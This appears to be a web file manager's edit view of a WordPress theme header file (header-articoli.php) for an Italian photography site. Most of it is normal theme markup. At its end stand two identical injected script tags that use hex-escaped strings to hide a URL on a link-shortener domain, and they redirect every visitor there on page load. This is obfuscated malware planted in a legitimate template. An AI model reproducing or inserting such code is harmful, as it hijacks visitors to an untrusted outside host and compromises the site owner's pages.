Edit File: header-articoli.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="<?php bloginfo('text_direction'); ?>" xml:lang="<?php bloginfo('language'); ?>"> <head> <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" /> <title><?php wp_title ( '|', true,'right' ); ?></title> <meta http-equiv="Content-language" content="<?php bloginfo('language'); ?>" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link href='http://fonts.googleapis.com/css?family=Signika:700,300&subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link rel="shortcut icon" href="<?php bloginfo('template_url'); ?>/images/favico.ico" type="image/x-icon" /> <link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('stylesheet_url'); ?>" /> <!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('template_url'); ?>/ie.css" /><![endif]--> <?php wp_enqueue_script('jquery'); wp_enqueue_script('cycle', get_template_directory_uri() . '/js/jquery.cycle.all.min.js', 'jquery', false); wp_enqueue_script('cookie', get_template_directory_uri() . '/js/jquery.cookie.js', 'jquery', false); if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); wp_enqueue_script('script', get_template_directory_uri() . '/js/script.js', 'jquery', false); ?> <?php wp_head(); ?> </head> <body <?php echo (get_option('bg_color')) ? 'style="background-color: '.get_option('bg_color').';"' : '' ?>> <div class="wrapper"> <div class="header clear"> <div class="logo"> <a href="http://www.formafoto.it/home-page/"><img src="http://www.formafoto.it/wp/wp-content/uploads/2013/05/logo_forma_header.jpg" alt="<?php bloginfo('name'); ?>"/></a> </div> <div class="testa"> <img src="http://www.formafoto.it/wp/wp-content/uploads/2013/07/headerPienoNero.png" alt="" width="595" height="160" /></div> <div class="sfondo_header"> <div class="lingua"> ita / <a href="#">eng</a> </div> <?php wp_nav_menu(array('menu' => 'Sidebar articoli', 'theme_location' => 'Sidebar articoli', 'depth' => 0, 'container' => 'div', 'container_class' => 'menu_sidebar', 'menu_class' => 'menu_sidebar', 'menu_id' => 'menu_sidebar')); ?> </div> <?php get_search_form(); ?> <?php wp_nav_menu(array('menu' => 'Navigation2', 'theme_location' => 'Navigation2', 'depth' => 0, 'container' => 'div', 'container_class' => 'nav3', 'menu_class' => 'bb', 'menu_id' => 'bb', 'walker' => new extended_walker())); ?> </div> <!-- Container --> <div id="container" class="clear"> <!-- Content --> <div id="content"> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script>
Back to File Manager